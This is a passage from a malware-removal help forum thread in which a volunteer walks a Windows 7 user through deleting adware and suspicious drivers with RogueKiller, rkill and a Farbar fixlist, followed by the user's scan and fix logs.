2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-19 19:58 - 2018-01-12 17:33 - 001665384 _____ (Microsoft Corporation) C:\Users\Martin\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================



#6 nasdaq

  • Malware Response Team

Posted 20 March 2018 - 07:50 AM

Hi,

Run the RogueKiller tool and delete these items.

¤¤¤ Tasks : 1 ¤¤¤
[Hj.Shortcut] \{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} -- "c:\program files (x86)\mozilla firefox\firefox.exe" (http://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin) -> Found

¤¤¤ Files : 1 ¤¤¤
[Root.Wajam][File] C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys -> Found

===

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 3 different versions. If one of them won't run then download and try to run the other one.
Vista and Win7 users need to right click and choose Run as Admin
You only need to get one of them to run, not all of them.

rkill.exe
rkill.com
rkill.scr

It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested on another computer and then transfer them to the desktop of the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

When completed it will create a log. Please post the content on your next reply.
===

The files we are trying to delete may be protected.
Boot your computer to Safe Mode.

Run the CMD.exe and run it as an administrator.
Delete these files in bold if still present.
C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys

Please let me know what problem persists with this computer.
C:\Windows\System32\Drivers\alspgeyc.sys

===

Type EXIT at the DOS prompt to return to the Operating System.

Restart the computer in normal mode.

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.

Please copy the entire contents of the code box below to a new file.


Start

CreateRestorePoint:
CloseProcesses:

U3 alspgeyc; C:\Windows\System32\Drivers\alspgeyc.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\alspgeyc.sys

Reboot:

End

Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.

===

Run the Farbar program and post a fresh FRST.txt log.

Let me know what problem persists.

#7 mortn

  • Topic Starter

Posted 20 March 2018 - 11:12 AM

Hello! Thanks again for helping me.

I have done as you instructed in the order you typed it, i.e. RogueKiller -> rkill.exe -> CMD -> FRST-fix -> FRST-scan.

However, there were some things which I did not manage to fully do:

When opening RogueKiller, I could only find [Root.Wajam][File] C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys, which was located under Quarantine in the History tab. I deleted it, but the other file was not there, so I could not do anything with it.

When trying to delete the two files with cmd.exe in fail safe, I got the prompt that the files could not be found. I tried to delete them by going to the correct folder C:\Windows\System32\Drivers\ and typing "del alspgeyc.sys" and "del ddd6ebd91f4ecf7d7f74107288edb1a0.sys" respectively, but neither file was present, so I could not delete them.

Other than that, everything went according to your instruction, as far as I could tell. Still got the "Failed to update(1)" prompt every time I launched FRST though.

Here are the logs (rkill-log, fixlog, and frst-log):

Rkill 2.9.1 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2018 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 03/20/2018 04:52:52 PM in x64 mode.
Windows Version: Windows 7 Ultimate Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * No issues found.

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * No issues found.

Program finished at: 03/20/2018 04:53:07 PM
Execution time: 0 hours(s), 0 minute(s), and 14 seconds(s)

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (20-03-2018 17:01:23) Run:3
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CreateRestorePoint:
CloseProcesses:

U3 alspgeyc; C:\Windows\System32\Drivers\alspgeyc.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\alspgeyc.sys

Reboot:

End
*****************

Error: (0) Failed to create a restore point.
Processes closed successfully.
alspgeyc => service not found.
"C:\Windows\System32\Drivers\alspgeyc.sys" => not found


The system needed a reboot.

==== End of Fixlog 17:01:23 ====

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (20-03-2018 17:02:41)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ATTENTION: => Could not perform signature verification. Cryptographic Service is not running.

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios)
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 ai6nfeur; C:\Windows\System32\Drivers\ai6nfeur.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 19:58 - 2018-03-19 20:33 - 000000000 ____D C:\ProgramData\RogueKiller
2018-03-19 19:58 - 2018-03-19 19:58 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2018-03-19 19:57 - 2018-03-19 19:57 - 000000867 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\Program Files\RogueKiller
2018-03-18 09:03 - 2018-03-20 17:02 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-20 17:01 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
